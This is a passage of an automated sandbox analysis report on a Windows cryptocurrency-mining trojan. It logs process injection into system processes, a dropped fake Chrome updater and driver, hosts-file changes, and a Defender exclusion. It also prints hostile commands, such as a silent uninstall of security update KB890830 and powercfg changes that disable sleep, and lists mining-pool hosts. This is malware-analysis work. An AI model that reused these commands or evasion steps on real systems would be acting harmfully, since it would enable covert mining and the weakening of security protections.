          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13F83A20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22360790000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24FBB770000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1E7778B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D2DB850000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26161A70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 208B1FB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E0571F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9F4B60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10DF0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D661170000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 23A75740000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D730000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D760000
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
          Source: dwm.exe, 00000028.00000002.3081210081.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6236F0 cpuid 30_2_00000225DC6236F0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC647960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,30_2_00000225DC647960
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Modifies the hosts file
          Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          File and Directory Permissions Modification          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Native API          		11
          Windows Service          		1
          Access Token Manipulation          		1
          Disable or Modify Tools          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Service Execution          		Logon Script (Windows)11
          Windows Service          		1
          Obfuscated Files or Information          		Security Account Manager24
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
          Process Injection          		1
          Install Root Certificate          		NTDS331
          Security Software Discovery          		Distributed Component Object ModelInput Capture1
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          File Deletion          		Cached Domain Credentials131
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Rootkit          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc Filesystem1
          Remote System Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Access Token Manipulation          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task713
          Process Injection          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
          Hidden Files and Directories          		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549101 Sample: file.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 57 monerooceans.stream 2->57 59 gulf.moneroocean.stream 2->59 67 Malicious sample detected (through community Yara rule) 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 Yara detected Xmrig cryptocurrency miner 2->71 73 9 other signatures 2->73 8 file.exe 1 3 2->8         started        12 updater.exe 1 2->12         started        signatures3 process4 file5 51 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 8->51 dropped 53 C:\Windows\System32\drivers\etc\hosts, ASCII 8->53 dropped 75 Uses powercfg.exe to modify the power settings 8->75 77 Modifies the context of a thread in another process (thread injection) 8->77 79 Modifies the hosts file 8->79 81 Modifies power options to not sleep / hibernate 8->81 14 dialer.exe 1 8->14         started        17 powershell.exe 23 8->17         started        19 cmd.exe 1 8->19         started        28 13 other processes 8->28 55 C:\Windows\Temp\jxhirqfmeznn.sys, PE32+ 12->55 dropped 83 Multi AV Scanner detection for dropped file 12->83 85 Writes to foreign memory regions 12->85 87 Adds a directory exclusion to Windows Defender 12->87 89 Sample is not signed and drops a device driver 12->89 21 dialer.exe 12->21         started        23 powershell.exe 21 12->23         started        25 dialer.exe 12->25         started        30 11 other processes 12->30 signatures6 process7 dnsIp8 91 Contains functionality to inject code into remote processes 14->91 93 Writes to foreign memory regions 14->93 95 Allocates memory in foreign processes 14->95 97 Contains functionality to compare user and computer (likely to detect sandboxes) 14->97 32 lsass.exe 14->32 injected 35 winlogon.exe 14->35 injected 41 2 other processes 14->41 99 Loading BitLocker PowerShell Module 17->99 37 conhost.exe 17->37         started        43 2 other processes 19->43 101 Injects code into the Windows Explorer (explorer.exe) 21->101 103 Creates a thread in another existing process (thread injection) 21->103 105 Injects a PE file into a foreign processes 21->105 45 5 other processes 21->45 39 conhost.exe 23->39         started        61 monerooceans.stream 149.102.143.109, 20128, 49730, 49731 COGENT-174US United States 25->61 107 Query firmware table information (likely to detect VMs) 25->107 47 13 other processes 28->47 49 11 other processes 30->49 signatures9 process10 signatures11 63 Installs new ROOT certificates 32->63 65 Writes to foreign memory regions 32->65

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe50%ReversingLabsWin64.Trojan.Generic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\Google\Chrome\updater.exe50%ReversingLabsWin64.Trojan.Generic
          C:\Windows\Temp\jxhirqfmeznn.sys5%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.digicert.c0%Avira URL Cloudsafe
          http://www.digicert.cPS0~0%Avira URL Cloudsafe
          http://ocsp.msocsp.0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          monerooceans.stream
          		149.102.143.109
          		truefalse
            		high
            gulf.moneroocean.stream
            		unknown
            		unknownfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.digicert.clsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.digicert.cPS0~lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ocsp.msocsp.lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                149.102.143.109
                                		monerooceans.streamUnited States
                                		174COGENT-174USfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1549101
                                Start date and time:2024-11-05 10:36:08 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 42s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:61
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:9
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.adwa.spyw.evad.mine.winEXE@87/15@1/1
                                EGA Information:
